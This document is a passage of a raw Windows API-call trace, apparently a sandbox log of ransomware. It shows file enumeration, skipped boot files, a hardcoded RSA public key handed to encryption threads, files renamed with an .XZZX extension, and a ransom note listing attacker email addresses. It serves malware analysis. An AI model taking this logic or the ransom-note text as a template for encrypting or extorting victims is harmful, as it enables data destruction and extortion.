StrStrW (lpFirst="E29C4433332B9D3DB3332D67374C8185.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0255.565] StrStrW (lpFirst="E29C4433332B9D3DB3332D67374C8185.XZZX", lpSrch="ntldr") returned 0x0 [0255.565] StrStrW (lpFirst="E29C4433332B9D3DB3332D67374C8185.XZZX", lpSrch="NTLDR") returned 0x0 [0255.565] StrStrW (lpFirst="E29C4433332B9D3DB3332D67374C8185.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0255.565] StrStrW (lpFirst="E29C4433332B9D3DB3332D67374C8185.XZZX", lpSrch="ntdetect.com") returned 0x0 [0255.565] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\", lpSrch="Desktop") returned 0x0 [0255.565] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\", lpSrch="DESKTOP") returned 0x0 [0255.565] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\") returned 67 [0255.565] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0255.565] lstrcpyW (in: lpString1=0x17addc, lpString2="E29C4433332B9D3DB3332D67374C8185.XZZX" | out: lpString1="E29C4433332B9D3DB3332D67374C8185.XZZX") returned="E29C4433332B9D3DB3332D67374C8185.XZZX" [0255.565] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\" [0255.565] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1458 [0255.565] Sleep (dwMilliseconds=0x96) [0255.720] FindNextFileW (in: hFindFile=0x3cdecd8, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0255.720] lstrcmpW (lpString1="FBBA7EFE065EC5DA534929CE0AC8AA22.XZZX", lpString2="..") returned 1 [0255.720] lstrcmpW (lpString1="FBBA7EFE065EC5DA534929CE0AC8AA22.XZZX", lpString2=".") returned 1 [0255.720] StrStrW (lpFirst="FBBA7EFE065EC5DA534929CE0AC8AA22.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0255.720] StrStrW (lpFirst="FBBA7EFE065EC5DA534929CE0AC8AA22.XZZX", lpSrch="ntldr") returned 0x0 [0255.721] StrStrW (lpFirst="FBBA7EFE065EC5DA534929CE0AC8AA22.XZZX", lpSrch="NTLDR") returned 0x0 [0255.721] StrStrW (lpFirst="FBBA7EFE065EC5DA534929CE0AC8AA22.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0255.721] StrStrW (lpFirst="FBBA7EFE065EC5DA534929CE0AC8AA22.XZZX", lpSrch="ntdetect.com") returned 0x0 [0255.721] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\", lpSrch="Desktop") returned 0x0 [0255.721] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\", lpSrch="DESKTOP") returned 0x0 [0255.721] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\") returned 67 [0255.721] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0255.721] lstrcpyW (in: lpString1=0x17addc, lpString2="FBBA7EFE065EC5DA534929CE0AC8AA22.XZZX" | out: lpString1="FBBA7EFE065EC5DA534929CE0AC8AA22.XZZX") returned="FBBA7EFE065EC5DA534929CE0AC8AA22.XZZX" [0255.721] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\" [0255.721] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x145c [0255.721] Sleep (dwMilliseconds=0x96) [0255.876] FindNextFileW (in: hFindFile=0x3cdecd8, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0255.876] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0255.876] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0255.877] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0255.877] FindNextFileW (in: hFindFile=0x3cdecd8, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0 [0255.877] FindClose (in: hFindFile=0x3cdecd8 | out: hFindFile=0x3cdecd8) returned 1 [0255.877] FindClose (in: hFindFile=0x3cdecd8 | out: hFindFile=0x3cdecd8) returned 0 [0255.877] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW" [0255.877] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\*.*" [0255.877] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\", lpSrch="Desktop") returned 0x0 [0255.877] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\", lpSrch="DESKTOP") returned 0x0 [0255.877] SetErrorMode (uMode=0x1) returned 0x1 [0255.877] wsprintfW (in: param_1=0x17a39c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\_HELP_INSTRUCTION.TXT") returned 84 [0255.877] GetUserNameW (in: lpBuffer=0x178178, pcbBuffer=0x177f64 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x177f64) returned 1 [0255.877] wsprintfW (in: param_1=0x177f70, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0255.877] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x177f6c | out: phkResult=0x177f6c*=0x1460) returned 0x0 [0255.878] RegQueryValueExW (in: hKey=0x1460, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43def70, lpcbData=0x177f68*=0x104 | out: lpType=0x0, lpData=0x43def70*=0x65, lpcbData=0x177f68*=0x4a) returned 0x0 [0255.878] RegCloseKey (hKey=0x1460) returned 0x0 [0255.878] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17939c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0255.878] wsprintfW (in: param_1=0x17839c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0255.878] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\dtms 07a7aq-xeuh0\\o903hcw\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1460 [0255.878] CloseHandle (hObject=0x1460) returned 1 [0255.878] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\*.*", lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0x3cdecd8 [0255.878] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW") returned="O903hcW" [0255.878] lstrcpyW (in: lpString1=0x17a5a4, lpString2="O903hcW" | out: lpString1="O903hcW") returned="O903hcW" [0255.878] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos" [0255.878] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0255.878] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpString2="xAriJR5aTdl" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl" [0255.878] SetErrorMode (uMode=0x1) returned 0x1 [0255.878] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl" [0255.878] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\" [0255.878] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\" [0255.878] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\*.*" [0255.878] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x3cdec58 [0255.878] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl") returned="xAriJR5aTdl" [0255.879] lstrcpyW (in: lpString1=0x17b644, lpString2="xAriJR5aTdl" | out: lpString1="xAriJR5aTdl") returned="xAriJR5aTdl" [0255.879] StrStrW (lpFirst="3B9FB280013C30BC79FE404005721504.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0255.879] StrStrW (lpFirst="3B9FB280013C30BC79FE404005721504.XZZX", lpSrch="ntldr") returned 0x0 [0255.879] StrStrW (lpFirst="3B9FB280013C30BC79FE404005721504.XZZX", lpSrch="NTLDR") returned 0x0 [0255.879] StrStrW (lpFirst="3B9FB280013C30BC79FE404005721504.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0255.879] StrStrW (lpFirst="3B9FB280013C30BC79FE404005721504.XZZX", lpSrch="ntdetect.com") returned 0x0 [0255.879] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\", lpSrch="Desktop") returned 0x0 [0255.879] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\", lpSrch="DESKTOP") returned 0x0 [0255.879] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\") returned 53 [0255.879] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0255.879] lstrcpyW (in: lpString1=0x17be7c, lpString2="3B9FB280013C30BC79FE404005721504.XZZX" | out: lpString1="3B9FB280013C30BC79FE404005721504.XZZX") returned="3B9FB280013C30BC79FE404005721504.XZZX" [0255.879] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\" [0255.879] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1468 [0255.879] Sleep (dwMilliseconds=0x96) [0256.032] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0256.032] lstrcmpW (lpString1="ADBC71E42FBA59E00D479B5F33DB3E28.XZZX", lpString2="..") returned 1 [0256.032] lstrcmpW (lpString1="ADBC71E42FBA59E00D479B5F33DB3E28.XZZX", lpString2=".") returned 1 [0256.032] StrStrW (lpFirst="ADBC71E42FBA59E00D479B5F33DB3E28.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0256.032] StrStrW (lpFirst="ADBC71E42FBA59E00D479B5F33DB3E28.XZZX", lpSrch="ntldr") returned 0x0 [0256.032] StrStrW (lpFirst="ADBC71E42FBA59E00D479B5F33DB3E28.XZZX", lpSrch="NTLDR") returned 0x0 [0256.033] StrStrW (lpFirst="ADBC71E42FBA59E00D479B5F33DB3E28.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0256.033] StrStrW (lpFirst="ADBC71E42FBA59E00D479B5F33DB3E28.XZZX", lpSrch="ntdetect.com") returned 0x0 [0256.033] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\", lpSrch="Desktop") returned 0x0 [0256.033] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\", lpSrch="DESKTOP") returned 0x0 [0256.033] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\") returned 53 [0256.033] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0256.033] lstrcpyW (in: lpString1=0x17be7c, lpString2="ADBC71E42FBA59E00D479B5F33DB3E28.XZZX" | out: lpString1="ADBC71E42FBA59E00D479B5F33DB3E28.XZZX") returned="ADBC71E42FBA59E00D479B5F33DB3E28.XZZX" [0256.033] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\" [0256.033] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x146c [0256.033] Sleep (dwMilliseconds=0x96) [0256.189] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0256.189] lstrcmpW (lpString1="DB53A738127CCAEBB87D0318169DAF33.XZZX", lpString2="..") returned 1 [0256.189] lstrcmpW (lpString1="DB53A738127CCAEBB87D0318169DAF33.XZZX", lpString2=".") returned 1 [0256.189] StrStrW (lpFirst="DB53A738127CCAEBB87D0318169DAF33.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0256.189] StrStrW (lpFirst="DB53A738127CCAEBB87D0318169DAF33.XZZX", lpSrch="ntldr") returned 0x0 [0256.189] StrStrW (lpFirst="DB53A738127CCAEBB87D0318169DAF33.XZZX", lpSrch="NTLDR") returned 0x0 [0256.189] StrStrW (lpFirst="DB53A738127CCAEBB87D0318169DAF33.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0256.189] StrStrW (lpFirst="DB53A738127CCAEBB87D0318169DAF33.XZZX", lpSrch="ntdetect.com") returned 0x0 [0256.189] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\", lpSrch="Desktop") returned 0x0 [0256.189] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\", lpSrch="DESKTOP") returned 0x0 [0256.189] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\") returned 53 [0256.189] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0256.189] lstrcpyW (in: lpString1=0x17be7c, lpString2="DB53A738127CCAEBB87D0318169DAF33.XZZX" | out: lpString1="DB53A738127CCAEBB87D0318169DAF33.XZZX") returned="DB53A738127CCAEBB87D0318169DAF33.XZZX" [0256.189] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\" [0256.189] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1470 [0256.190] Sleep (dwMilliseconds=0x96) [0256.344] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0256.344] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0256.344] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0256.345] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0256.345] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0256.345] FindClose (in: hFindFile=0x3cdec58 | out: hFindFile=0x3cdec58) returned 1 [0256.345] FindClose (in: hFindFile=0x3cdec58 | out: hFindFile=0x3cdec58) returned 0 [0256.345] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl" [0256.345] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl", 